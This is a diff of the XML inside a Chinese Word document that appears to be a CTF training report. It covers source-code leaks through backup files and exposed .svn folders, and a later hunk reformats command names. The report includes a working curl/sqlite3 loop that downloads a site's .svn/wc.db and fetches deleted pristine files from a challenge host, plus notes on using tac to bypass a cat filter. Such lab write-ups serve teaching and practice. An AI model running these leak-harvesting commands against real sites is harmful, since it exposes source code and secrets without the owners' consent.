+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>index.php.bak  →  .bak  →  静态文件  →  原样输出 ✅ 泄露</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>index.bak.php  →  .php  →  交给 PHP  →  不泄露</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="25"/>
+        </w:rPr>
+        <w:t>2.2.3 SVN 泄露</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>成因</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">：在 web 目录 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>svn checkout</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.svn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 留在 web 根。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>正确做法</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>svn export</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">（不带 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.svn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>）。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>两代结构：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>≤ 1.6</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.svn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 位置：每个子目录</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>元数据：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>entries</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（纯文本，有文件列表）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>内容：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>text-base/&lt;名&gt;.svn-base</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>≥ 1.7</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>.svn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 位置：只有根目录</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>元数据：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>wc.db</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>（SQLite）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListBullet2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>内容：</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pristine/&lt;sha1前2位&gt;/&lt;sha1&gt;.svn-base</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>1.7+ 打法（实测）：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>curl -o wc.db "$T/.svn/wc.db"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>sqlite3 wc.db "SELECT checksum, size, refcount FROM PRISTINE;"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>#   $sha1$bf45c36a... | 221 | 1     ← 还在用</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>#   $sha1$0b4474e3... |  33 | 0     ← ★ 被删掉的旧版本</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>`refcount = 0` = 没有任何工作副本文件引用它 = 被删掉的旧版本残留。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>⚠️ 只看 `NODES` 会漏</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">：被删的文件 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>presence='not-present'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>、</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>checksum</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 为空。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>四行版：</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>T="http://challenge-xxx:10800"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>curl -o wc.db "$T/.svn/wc.db"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>for h in $(sqlite3 wc.db "SELECT checksum FROM PRISTINE;" | sed 's/\$sha1\$//'); do</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  curl -s "$T/.svn/pristine/${h:0:2}/${h}.svn-base"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="252" w:lineRule="auto"/>
+        <w:ind w:left="283"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="18"/>
+        </w:rPr>
+        <w:t>done | grep -a ctfhub</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="40"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+      </w:pPr>
+      <w:r/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:b/>
+          <w:color w:val="2E548A"/>
+          <w:sz w:val="25"/>
+        </w:rPr>
+        <w:t>2.2.4 HG 补充细节（题目 4 的延伸）</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/task9-实战训练报告.docx
+++ b/task9-实战训练报告.docx
@@ -68,11 +68,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`ls`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -105,11 +105,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`ls -la`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>ls -la</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -157,11 +157,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`pwd`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>pwd</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -185,15 +185,7 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>本次使用场景：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>一步定位 web 根</w:t>
+        <w:t>本次使用场景：一步定位 web 根</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -202,11 +194,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`find / -name "*flag*"`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>find / -name "*flag*"</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -230,22 +222,22 @@
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
           <w:sz w:val="21"/>
         </w:rPr>
-        <w:t>本次使用场景：找 flag 文件（</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>别加 `-maxdepth`，会漏</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>）</w:t>
+        <w:t xml:space="preserve">本次使用场景：找 flag 文件（别加 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>-maxdepth</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>，会漏）</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -254,11 +246,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`find / -name index.php`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>find / -name index.php</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -291,11 +283,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`file` / `stat`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>stat</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -331,26 +338,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`cat`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：最常用，但</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>常被过滤</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>cat</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>：最常用，但常被过滤</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -359,33 +358,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`tac`</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>cat 反过来</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">，按行逆序输出 —— 绕过 </w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>tac</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve">：cat 反过来，按行逆序输出 —— 绕过 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -409,11 +393,26 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`head -1` / `tail`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>head -1</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>tail</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -429,11 +428,41 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`sort` / `nl` / `rev`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>sort</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> / </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
